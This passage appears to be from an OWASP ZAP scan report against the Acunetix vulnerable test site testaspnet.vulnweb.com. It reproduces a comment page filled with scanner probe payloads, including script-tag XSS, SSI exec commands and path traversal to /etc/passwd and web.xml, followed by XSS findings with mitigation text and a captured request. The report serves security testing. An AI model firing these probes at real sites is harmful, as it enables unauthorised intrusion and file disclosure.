          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:41 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:42 PM</DIV><DIV class="CommentText"></div><script>alert(1);</script><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:31 PM</DIV><DIV class="CommentText">c:/Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">c:\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">/etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:\</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">/WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">\WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">thishouldnotexistandhopefullyitwillnot</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          tbComment
          Attack
          </div><script>alert(1);</script><div>
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

          Phases: Implementation; Architecture and Design

          Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

          For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

          Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

          Phase: Architecture and Design

          For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

          If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

          Phase: Implementation

          For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

          To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

          Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

          When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

          Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

      2. Cross Site Scripting (Reflected) (3)
        1. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2
          Alert tags
          Alert description

          Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

          When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

          There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

          Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

          Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

          Request
          Request line and header section (377 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          Content-Length: 0
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:07:27 GMT
          Content-Length: 30484
          
          
          Response body (30484 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=javascript%3aalert(1)%3b&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRha